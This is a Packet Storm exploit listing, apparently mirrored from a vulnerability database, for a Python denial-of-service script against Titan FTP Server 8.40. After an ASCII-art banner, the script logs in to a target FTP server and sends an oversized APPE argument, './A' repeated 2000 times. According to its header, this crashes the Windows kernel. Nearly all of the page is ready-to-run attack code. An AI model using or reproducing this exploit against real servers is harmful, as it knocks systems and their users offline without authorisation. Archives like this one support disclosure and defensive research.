Titan FTP Server 8.40 Denial Of Service

🗓️ 27 Nov 2011 00:00:00Reported by Houssam SahliType
packetstorm🔗 packetstormsecurity.com👁 26 Views
Titan FTP Server 8.40 DoS Kernel Cras
`#!/usr/bin/python  
#  
# Exploit Title : Titan FTP Server 8.40 DoS Kernel Crash  
# Date: 25/11/2011  
# Author: Houssam Sahli  
# Software Link (trial version) : http://southrivertech.com/software/demosoft/titanftp.exe  
# Version: 8.40  
# Developed by : South River Technologies, Inc.  
# Tested on: Windows XP SP3 French  
# Description : This exploit crashs the kernel of a Windows running TITAN FTP Server 8.40 and succeed the magical "blue screen of death".  
# Thanks to : Mehdi Boukazoula and Rwissi Networking for their support ;)...because we can improve computer security in Algeria, we'll do it.  
  
print "\n2ctUtjjJUJUJUJUJjJUJtJtJUUtjfUtt2UftftfUftft1t1tFfF21fhf11Ft"  
print "ULcYLYLYLcLc7LLcLccJcJYJYJYjJtJjJtjtJtJtUtjUJjJUJtJUJtjtUtUj"  
print "tLUJjJJcJcJcJcJYjhPX0Pb99pb9EbMEDEDEMDZbZDD0XfFf1f2tFf22F21U"  
print "JYJJcJcJcJcJcJcJ2 1hf1f1f1212h2h1f"  
print "ULJcJcJLYLL7L7L71 Houssam Sahli 1h1f2f2fFt1fF1Ft"  
print "ULJcJcJLYLL7L7L71 [email protected] 1h1f2f2fFt1fF1Ft"  
print "JccJcY7Lr7777LrLY 1ht2t1t1f1t12F12"  
print "J7JLcr7r777777L7cUF1hfU7r:i:i:i:rirrj2MRQMMbhf1t2t1tFf1f1tFU"  
print "Y7cLr777r7rrrrrrrLr:, .LPRQQQQQQQQDX7:.:7SpXfFt1f1t121th2Fft"  
print "J7crc77rriririri: ,:tQQQQQQQQQQQQQQQQQRJ:,i19FFf1t2f2f21hfFU"  
print "Y7r777rrii:i::: JQQQQQQPFfS0MM02hftXQRZPc, ipXSf1t2t1t1fF2f"  
print "Jr777rrii::::, ,QQQQQQQi..::::i:irRR.,hfL7L: JpSf1tFt12h1Ft"  
print "cr7c77rri::: 7QQQQQQQ1:Et7jjJ7Lrr7r. ci::i7. iPS22fFf12F12"  
print "Jr7LLrrir:i EQQQQQQQQr:QQQQQ9L7Lri., i.::rtY :hSf1f121fFU"  
print "c7rL77rrrr. DQQQQQQQQQ:::riri77c77i. .ri7LfE9 ihh2Ffhfhf2"  
print "j7crc77r7i UQQQjrir:rQQFcii:ii77Lrr., f11PpZQZ.JFF1h2F1hf"  
print "JLcLrLLLL..QQQc.irr7i0QQQQQMhUrr7Lrr:., :Q9QQQQQQh:1t2tft1f2"  
print "J7Jcc7LLJ cQQQQL:i777irUMQQQQQQL77L77rr:pJ:7PQQQQQ:Jhf1tFt2J"  
print "JccJcc7c7 2QQQQQE7:r7Lri:r7hDQQQ7LLYLJLc7rrr::XQQQ.jFF1h1h11"  
print "tLjJJcJJJ bQQQQQQQRULr77Lrriii7LcLYLYLYLLLc77:cQQQ7cX2h2h2hf"  
print "jJJUJjJtY 0QQQQQQQQQ0Mt7rrr777777L7LLcLc7c77::ZQQQJJFh2h2FF1"  
print "tLUjjYUjt,tQQQQQQQS .QQQF7iiirr77L7L7L77ii:LMQQQQ72S1h1h1Sf"  
print "tjjtjjJff:.QQQQQQQQ ::QQQMpftJc7c77rriLhQQQQQQf:02h1h1F12"  
print "2J2UfUttFJ,Q: QQb YQQQQQQQQQQQQQQQQQQQQQQ tXF2F1F2hU"  
print "fjf2Uft2thrr :L, , QQQQQQQQQribF2h2F1h22"  
print "FJ1t2t2t22hrt, , ,,, , tPJ7 :QQQQQQQQU:bS2h2hfF2h2"  
print "tUt1t2f1t11SLS. ,,,,,,,,,,,,, .rt. QQQ1Sp1p2r9Xfh2h2F2h1F"  
print "1J1t2t1t2t12SYhr ,,,,,,,,,,, .QQF. .tbS2F1F2F1F1hf"  
print "ftf1f1f1t2f12Xt2L. ,,,,,,,,,,,,, fQf .fR0Ffh1h1h2h1F21"  
print "hUFt1t1f2t2t1fXhFUL: , , , : .jRRSF2h2h1h1SFF2Sf"  
print "2f2FfF2Ff12122fhFphhJ7:. ,:JpRR0212FFh1S1h2hFhF1"  
print "hUF21fFf12Ffh2F2h1XX9X9SXffjUccLcJtfpERZESh1hFhFSFS1hFS1S1Sf\n"  
  
print "\nYou need a valid account to succeed this DoS, but even anonymous can do it as long as it has permission to call APPE command.\n"  
  
import socket  
import sys  
  
def Usage():  
print ("Usage: ./expl.py <host> <Username> <password>\n")  
buffer= "./A" * 2000  
def start(hostname, username, passwd):  
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)  
try:  
sock.connect((hostname, 21))  
except:  
print ("[-] Connection error!")  
sys.exit(1)  
r=sock.recv(1024)  
print "[+] " + r  
sock.send("user %s\r\n" %username)  
r=sock.recv(1024)  
sock.send("pass %s\r\n" %passwd)  
r=sock.recv(1024)  
print "[+] wait for the crash...;)"  
sock.send("APPE %s\r\n" %buffer)  
sock.close()  
  
if len(sys.argv) <> 4:  
Usage()  
sys.exit(1)  
else:  
hostname=sys.argv[1]  
username=sys.argv[2]  
passwd=sys.argv[3]  
start(hostname,username,passwd)  
sys.exit(0)  
`
27 Nov 2011 00:00Current
7.4High risk
Vulners AI Score7.4